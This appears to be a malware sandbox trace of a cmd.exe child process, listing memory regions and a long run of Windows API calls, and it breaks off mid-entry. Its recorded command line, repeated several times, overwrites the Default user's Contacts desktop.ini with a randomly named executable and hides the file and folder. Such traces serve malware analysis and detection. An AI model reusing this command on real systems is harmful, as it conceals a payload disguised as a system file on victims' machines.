"c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16bc0" os_pid = "0x140" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h 
\"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30794 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30795 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30796 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30797 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 30798 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30799 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30800 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30801 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" 
Region: id = 30802 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 30803 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30852 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30853 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30854 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30855 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 30856 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 30857 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30858 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30859 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30860 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" 
(normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30861 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30862 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30863 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30864 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30865 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30866 start_va = 0xf0000 end_va = 0x1b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 30867 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30868 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30869 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30870 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000000d0000" filename = "" Region: id = 30871 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 30872 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 30873 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 30874 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 30875 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 30876 start_va = 0x12a0000 end_va = 0x156efff entry_point = 0x12a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 709 os_tid = 0x84c [0209.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfdec | out: lpSystemTimeAsFileTime=0x2cfdec*(dwLowDateTime=0xb176e1e0, dwHighDateTime=0x1d440a9)) [0209.136] GetCurrentProcessId () returned 0x140 [0209.136] GetCurrentThreadId () returned 0x84c [0209.136] GetTickCount () returned 0x3ac45 [0209.136] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfde4 | out: lpPerformanceCount=0x2cfde4*=26592567529) returned 1 [0209.137] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0209.137] __set_app_type (_Type=0x1) [0209.137] __p__fmode () returned 0x76b331f4 [0209.137] __p__commode () returned 0x76b331fc [0209.137] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0209.138] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, 
_Env=0x4a9e423c) returned 0 [0209.138] GetCurrentThreadId () returned 0x84c [0209.138] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x84c) returned 0x38 [0209.138] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0209.138] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0209.138] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.138] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0209.138] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfd7c | out: phkResult=0x2cfd7c*=0x0) returned 0x2 [0209.138] VirtualQuery (in: lpAddress=0x2cfdb3, lpBuffer=0x2cfd4c, dwLength=0x1c | out: lpBuffer=0x2cfd4c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0209.138] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfd4c, dwLength=0x1c | out: lpBuffer=0x2cfd4c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0209.138] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfd4c, dwLength=0x1c | out: lpBuffer=0x2cfd4c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0209.138] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfd4c, dwLength=0x1c | out: lpBuffer=0x2cfd4c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0209.138] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfd4c, dwLength=0x1c | out: lpBuffer=0x2cfd4c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, 
Type=0x40000)) returned 0x1c [0209.138] GetConsoleOutputCP () returned 0x1b5 [0209.139] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0209.139] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0209.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.139] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0209.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.139] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0209.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.139] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0209.139] _get_osfhandle (_FileHandle=0) returned 0x3 [0209.139] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0209.139] _get_osfhandle (_FileHandle=0) returned 0x3 [0209.140] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0209.140] GetEnvironmentStringsW () returned 0x440418* [0209.140] FreeEnvironmentStringsW (penv=0x440418) returned 1 [0209.140] GetEnvironmentStringsW () returned 0x440418* [0209.140] FreeEnvironmentStringsW (penv=0x440418) returned 1 [0209.140] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cecec | out: phkResult=0x2cecec*=0x40) returned 0x0 [0209.140] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x0, lpData=0x2cecf8*=0xc8, lpcbData=0x2cecf0*=0x1000) returned 0x2 [0209.140] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x1, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.140] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cecf4, 
lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x0, lpData=0x2cecf8*=0x1, lpcbData=0x2cecf0*=0x1000) returned 0x2 [0209.140] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x0, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.140] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x40, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.140] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x40, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x0, lpData=0x2cecf8*=0x40, lpcbData=0x2cecf0*=0x1000) returned 0x2 [0209.141] RegCloseKey (hKey=0x40) returned 0x0 [0209.141] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cecec | out: phkResult=0x2cecec*=0x40) returned 0x0 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x0, lpData=0x2cecf8*=0x40, lpcbData=0x2cecf0*=0x1000) returned 0x2 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x1, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x0, 
lpData=0x2cecf8*=0x1, lpcbData=0x2cecf0*=0x1000) returned 0x2 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x0, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x9, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x9, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x0, lpData=0x2cecf8*=0x9, lpcbData=0x2cecf0*=0x1000) returned 0x2 [0209.141] RegCloseKey (hKey=0x40) returned 0x0 [0209.141] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ab [0209.141] srand (_Seed=0x5b8863ab) [0209.141] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\"" [0209.141] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h 
\"C:\\Users\\Default\\Contacts\"" [0209.141] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0209.142] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441b78, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0209.142] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0209.142] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.142] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0209.142] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0209.142] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0209.142] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0209.142] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0209.142] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0209.142] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0209.142] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0209.142] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0209.142] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0209.142] GetEnvironmentStringsW () returned 0x442568* [0209.143] FreeEnvironmentStringsW (penv=0x442568) returned 1 [0209.143] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.143] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0209.143] _wcsicmp 
(_String1="KEYS", _String2="CD") returned 8 [0209.143] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0209.143] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0209.143] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0209.143] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0209.143] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0209.143] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0209.143] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0209.143] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfab8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0209.143] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfab8, lpFilePart=0x2cfab4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cfab4*="Desktop") returned 0x18 [0209.143] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0209.143] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf834 | out: lpFindFileData=0x2cf834) returned 0x440bf8 [0209.143] FindClose (in: hFindFile=0x440bf8 | out: hFindFile=0x440bf8) returned 1 [0209.144] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf834 | out: lpFindFileData=0x2cf834) returned 0x440bf8 [0209.144] FindClose (in: hFindFile=0x440bf8 | out: hFindFile=0x440bf8) returned 1 [0209.144] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf834 | out: lpFindFileData=0x2cf834) returned 0x440bf8 [0209.144] FindClose (in: hFindFile=0x440bf8 | out: hFindFile=0x440bf8) returned 1 [0209.144] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0209.144] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0209.144] 
SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0209.144] GetEnvironmentStringsW () returned 0x440418* [0209.144] FreeEnvironmentStringsW (penv=0x440418) returned 1 [0209.144] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0209.145] GetConsoleOutputCP () returned 0x1b5 [0209.145] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0209.145] GetUserDefaultLCID () returned 0x409 [0209.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfbf8, cchData=128 | out: lpLCData="0") returned 2 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfbf8, cchData=128 | out: lpLCData="0") returned 2 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfbf8, cchData=128 | out: lpLCData="1") returned 2 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: 
lpLCData="Sun") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0209.146] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0209.147] GetConsoleTitleW (in: lpConsoleTitle=0x430a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0209.147] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0209.147] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0209.147] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0209.148] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0209.148] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0209.148] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0209.149] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0209.149] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0209.149] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0209.149] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0209.151] _wcsicmp (_String1="del", _String2=")") returned 59 [0209.151] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0209.151] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0209.151] _wcsicmp (_String1="IF", _String2="del") returned 5 [0209.151] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0209.151] _wcsicmp (_String1="REM", _String2="del") returned 14 [0209.151] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0209.153] _wcsicmp (_String1="type", _String2=")") returned 75 [0209.153] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0209.153] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 
[0209.153] _wcsicmp (_String1="IF", _String2="type") returned -11 [0209.153] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0209.153] _wcsicmp (_String1="REM", _String2="type") returned -2 [0209.153] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0209.156] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0209.156] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0209.156] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0209.156] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0209.156] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0209.156] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0209.261] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0209.261] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.270] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.274] FindClose (in: hFindFile=0x4424e8 | out: hFindFile=0x4424e8) returned 1 [0209.274] FindClose (in: hFindFile=0x4424e8 | out: hFindFile=0x4424e8) returned 1 [0209.274] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0209.275] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0209.275] GetConsoleTitleW (in: lpConsoleTitle=0x2cf620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.275] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf4a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf570 | out: lpAttributeList=0x2cf4a8, lpSize=0x2cf570) returned 1 [0209.275] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf4a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf568, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: 